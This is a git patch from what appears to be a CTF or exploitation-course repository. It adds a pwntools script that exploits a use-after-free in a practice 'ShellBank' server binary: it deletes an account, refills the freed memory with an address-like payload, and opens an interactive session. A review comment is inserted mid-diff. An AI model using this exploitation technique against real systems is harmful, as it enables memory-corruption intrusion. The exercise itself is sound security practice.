From a922995ff3faba3387fc4e952b2248a91eecf278 Mon Sep 17 00:00:00 2001
From: Jack Ren
Date: Mon, 4 Apr 2022 13:29:45 +0800
Subject: [PATCH] Finished UAF/ShellBank
---
UAF/ShellBank/answer.py | 50 ++++++++++++++++++++++++++++++++++++++++
UAF/ShellBank/server | Bin 0 -> 17512 bytes
2 files changed, 50 insertions(+)
create mode 100755 UAF/ShellBank/answer.py
create mode 100755 UAF/ShellBank/server
diff --git a/UAF/ShellBank/answer.py b/UAF/ShellBank/answer.py
new file mode 100755
index 0000000..59ea608
--- /dev/null
+++ b/UAF/ShellBank/answer.py
@@ -0,0 +1,50 @@
+#!/usr/bin/env python2
+# coding = utf-8
+
+from pwn import *
+from LibcSearcher import *
+context(arch = "amd64", os = "linux", log_level = "debug")
+
+def send_choice(choice):
+ p.recvuntil('> ')
+ p.sendline(str(choice))
+
+def add_account(name):
+ send_choice(3)
+ p.recvuntil('Enter account name: ')
+ p.sendline(name)
+
+def record_payment(message, money, receiver, sender):
+ send_choice(4)
+ p.recvuntil('Enter reference: ')
+ p.sendline(message)
+ p.recvuntil('Enter value: ')
+ p.sendline(str(money))
+ p.recvuntil('Enter id of recipient: ')
+ p.sendline(str(receiver))
+ p.recvuntil('Enter id of sender: ')
+ p.sendline(str(sender))
+
+def refund_payment(transaction_id, account_id):
+ send_choice(5)
+ p.recvuntil('Enter transaction id: ')
+ p.sendline(str(transaction_id))
+ p.recvuntil('Enter id of either account: ')
+ p.sendline(str(account_id))
+
+def delete_account(account):
+ send_choice(6)
+ p.recvuntil('Enter account id: ')
+ p.sendline(str(account))
+
+
+p = process('./server')
+elf = ELF('./server')
+gdb.attach(p, "")
+add_account(b'A')
+add_account(b'B')
+record_payment(b'Transaction-Normal', 0, 0, 1)
+delete_account(1)
+record_payment(b'\xc9\x17\x40', 0, 0, 0)
+refund_payment(0, 0)
+p.interactive()
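Review bot: The driver sequence at the bottom of answer.py is undocumented: nothing says what the byte string `b'\xc9\x17\x40'` in the second `record_payment` call is, or why the delete-then-record-then-refund order matters, so a reader cannot tell which object lifetime in `server` is being violated or what a fix would need to guarantee. A comment above `delete_account(1)` should state that transaction 0 still names account 1 as sender when the account is deleted (presumably the stale reference the UAF directory name refers to), and that the three bytes look like a little-endian address in the binary — both to be confirmed against the server's code, which is not part of this commit. `gdb.attach(p, "")` is a debugging leftover that makes every run depend on gdb and a terminal; gate it, e.g. `if args.GDB: gdb.attach(p)`. `from LibcSearcher import *` and `elf = ELF('./server')` are never used, and `# coding = utf-8` does not match the PEP 263 pattern because of the space before `=`, so it declares nothing; `# coding: utf-8` would.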
diff --git a/UAF/ShellBank/server b/UAF/ShellBank/server new file mode 100755 index 0000000000000000000000000000000000000000..682959c27b89d4e43494bb245f47673cad393df5 GIT binary patch literal 17512 zcmeHPdvILUc|W_dY+-Ckeh4cz;ETai8{)NOgDs25+?BQFipq}|3rxUVuXeAb#j9Oq z_pXsM7))dc%Odau(mH9As7%_>cF54wp-yIEWSd$;N?SuS)J^H25C>M3AqtP81jF|C zoyXO^Ybi6C&h(GW9?#zIe82B;zVn@PkM8UEfl%9Kzt6{1@w1JLxS?vDL*mHTiYCrV ztbtw1ban;1oXrF>13#Thh>Dt`-F_iZv_k5Yfs)-bQvQrz2S>b41fE4vR7FUX>?VsY ztAd`TfKU`=)q*Fxa;i$6$^I!i_fny!sM2%V(}bL9x~NEcmODjzlDh3Elmm?^64J`X#YYN_$NiAwtp+1_+{8JGQ2RI+S!Jl3)9`qlC1s(37s>08y; zux{15>jUXzU=8p0LNrfv>gKKO?AzP^eoo<`@Xj-DzxCLCFTHik-j3`)P}~#)`6C@F zq_5IX^*Q*FocGJ8v4g&9KVft6qq6df$1d+|4_9w^FQ=xZ5V(#O>hoQ^s*>NS@I}+$ zZPVbPX>c08sr=tM4Zd<3{88WMNrvO{xJ6_r=Q)x0H{$}8cO1jte=^G$8i992bg;eG{zu5jUW&Ztu7!qplpRJsL?sDOB33o|L)lvpZ87O6-lz~zPN*O3+pp=2)3>f|A zD~w$EJF6Kp9vZU!g)>I~ixsCFwZaW=LR46O4#%pcI%>pslYDfffU^8&#M7nY=o!wx zO1z)=A_cI=bt8? zE)7TbfUke2HT%llM)pmk|J?ZYovp(|Y>Cc{;S+<4i44EK2r<{pgv|$4OIsK_)fuQ- zdI;9k9q`9`aRF&G(a~OTj9^N`B`*+A80kEGs?%+tv*TRr{!7M5AmZe)L%zaKp~UA`2EZ}%w~pSQiS$4N1J;JlH|j2PMW zvqmm7V&wE%BO979`VUO7Og(ROY#k&MIlX#A=zL~A>dfq-aIP!;pwGM)oy|WDCi8)9rA+y&_lhx2rJZK(gDVI#P_zh(0bBjkY6X^lv%1 z$sDTsLqnOjg@CJRyrWJxknaQeTzM;6Y5Ejr!M-KO>3M}Q(DW#7+jy7r6Bi1F(Z>+} zaq5HU)(603o+gX|o=OCK+Q|NUJ_}K<=A+N@xFn)T#pt+53&a?Jb2&&MZ9ko4|WVG zsd)gpxzGjU#0Y$0VCbBw`r42)mFh5+vKhqNj)}45Y%X*jsecx8y?@+yXecu;7s>

YwB>a4cFS1|H~0)qF*H9M z#FB>b6;dD{VSI~%6l2T^eb7JYm@n?c{sqARZ; z*}QMOD`U7p&AE{*fV?fDvEqjyl0tBTG#b=p#@Z4qZT`Y^)jc61miIo*x>r>oAXA#iK5o ztVdkw#|cGxG}@Ot?R^n$`a>6dnD7OhsrUcj@L{Jd8g1kcp5O9}62mi@d<6{04xp(n z-qh=^hOjX4EU8S0-e+k%c}7IXXnf&%Z~`6Xo%|1O1ZaSufu;wjnZKZVuEy_eWSF|G zrsY5rJypv8DKrl|XX73$0e^`F^EfF|JKfw-`Gan3r@#i>m=5fC1&m&x1t1?Lm2CN! zp@NVqsG&-N2AUR8-7o4#P#5#_Dh`BTLwP>r;2VHfJs-kvs6SudKT%%wm5;HMXNQb| zg%9x<2g+ArRB|)?7_@Qy39$KgH0Fz6Jw0UF$eK`VmEfobtv34*oK5q#C`x zgzUa0?B+Z2`-I(~u&Z+LryP7(oCr~2`9AU?;%Ig>sC(}?_!l_d^ri!RMkwMhI4M5q z;Ppar*a61>hxg$Fp?HsjR|v)D9bi}}$}=YD;BNq@vovxhm%-`&fibXU5Iygt6Ztzd z_ybK3JIY@cPR@zeF5n7F^y?cOZ?YZ5JA@+t^E1%&Z;s*@skQceE_5!7RV9B8t&9cH z#J3!crNVMVH1Tx@Ur&~y5g2_FXVcgm7%f9{`4>J!pvN#ylh;7O+uH`3x~^s{cw1}s zwP1T|_QT-LVD>`0F|cYE;9J{PenQu<`L(b$PJB{kFRA~}s->(g`(9i2-Inaz!NS5f zjQ&$TW5a)C{+q6C@7x`{E4Vv&chJNY7du61p=)5zRWHrLQYmGilz~zP{;)GZ@2RNV zxoWqzv)j@-!il|FG7;aer8B*~$&{VemPfU4B$CV|>@@xq-+A3`Ef|ej4#-Vg6Z^vP zn1gAts7xEFZ%SEV8wS1M{XJH~*6xkj-CD}(v{F_gVl`^Z({PLSl@mJ^PNc&TJC;na zJFnfX?XWsC3B2m-(p(a5g}C8==cImGOLjt{g;SOmPHUY>ycE1Q-8h>8Td_R45{*Ss zNz(-`FT6YPxYNU8OSU{J14KhDR@|bF$aJvP9kImfbT<#;b}Jr9_E?&o)Nbvz;_+rA z@+!t=hZ44x(je*yC!({pRa$+c7LTQEQ}Z$#=M z$&`~$0&gIYlB9A>;JQXF$^%wSvDq6nrY(;!5tHl%#;TFvXc3$U_h4)wSX-Z#BG;G! 
zU$<7_82b$A3cr{J7z6|v>y2T!i}19Sh*~KJbdM+x#O=evL_zXops=A?vaOdUhL%Vo zg*3VrpK9mu=l^~DuEV8;h2L^qGd+TzZ%NsW^zFht{PcGUg>ldk(C0v_-z^kg2R#W| zi_5#Ke^n?nfPNoz7wG=+LZJ`z#$Oi-M?e#x$3S=A0o8EfI|53DzE_~)`_c~P>#O!HnKP^6uy0m1y)UMB`F)W8h{jyymvm8D@H-2+hB>>Nfac2TC;Y9I zwU3vDDz$+bp~@AHmA6#ZJv`H>Z0MhLbESSyWkayCE?Bvuxl(Jctc8AaWd;AfK!g7V z_@Qu1rIdkE21*$yWuTOSQU*#H_m*D%Ztx+=Ajp##ikm+GR$fr%$g-*Md93g1sqp#EdCwilLm6AZ z)cNkk7qY45Um2@$zK8beUxu4(-3{@28C%5mOo>l^f9^Iab5^NIl+MQ)?AL`!MAT@# z^V65qay?XX`i7eDx+454iL3Qf>C^Y~KCDX5$T+DzDx2{0O_3j3Z^^$}k4cxxKKy+6 z;$E$<9K_*k_)Qi6bp84^_cM?Ebh(b2w@l^dS*|kwqH&~`iaxBG#p5_E^^4>D8OJZ4 zSMP8?7msflIxwH|FaN%%ye;53cjh@<1AMA|2fCjzZHjraei}cwOoQJk{U4U&sMh}; z;MMR?-vzmgE%lE|e1;T$h5Mh&%H|9GCnP?XaR0^U>3606OZc9N$^w35>{*F_RHJi* zKkGp4ha8tmF7om;_#4yU?@9k(m2rx3#ohwsbH2;3s$Mq@z7aU(r}#YmW8j)HcF`|z zKXcjB^85-**fSqF|BCW4zoxmg*PPhai zOxII;WGLCAR4_ChnJ%#-g|i3v6D_K7wzEk7>b=>9te{I z9TI!DkVnr(E=&MVLy$+)NwXWTYvL9&TerasFQ3dz8gCjXDE0P7yj*cu@dCz_FS#&Z z>7|#$x(1KthTNd$4Kf-xQx-O{ksaoS9gCQFgW?Q>JLwn-)9gs6WtaFaHl9NjPMXEi zCVwYK!{*&R=d`*Wf}LA7$ytkTVzZnhq#4Bm>HR%+xC7Kq3EHh{*mY;6dRYK3Vyr+{ zA`|Gy#IQXRtqCaD+`7sRcQG#O4&yahAi6&Re}dX6A=zi8()6N_t4YR$44DX%fvok$ zZ5H5}3)og4>U7>hmgF-vV0FtgwL1!1#R&^>$_firhvRThEP_^(@P$KwHz1rLuPi`s z>@fLVOWFUaO83FEc4OJ&Z+ z)gbNp7vzxBhu_q9Wv}j|Zv#fE%3eJW7?gpk`+unLQk=iLfzrLVvRC(OjWXaXrJagj z=_$Gwa=MpSyt=R3B@I;ni{qDW*_TkEP?f#9|9eE*tLF!*{o?)~lJ?EY;Y?lBs6mvo zg7D`hm!V#4Pv3D;PNX_626S*J)q*(BIRwjNl~qo%IJ)gMX|GB9LANsM5_afQMfO9| zen=_?)q@=AN7*a4-zc(I_pvkN119y{Md{0Fp;$I3?N$Dr`&~__j5q?ptNaNL|1SY5 z)PJQmvP=hucgf2*arVaxPK>px6MY^(x4pW5?xPbMWsh6Z;yuxXI(cDq(tNT6m{}ibIk3h{YWv9mR=dh*z zD|@xyd3-fM6s0G)i`#z-0=GTWb)i}($R0tQqiSE#UqRxw-y`k!Nc-v9R}Mc!g?y>_ z4@&!9X|F3qNwp&Wx8SLLsqRRX{U14qsE{rdH!YeXTz*8wFFQ)71KkU#eyjD9&JPtk jH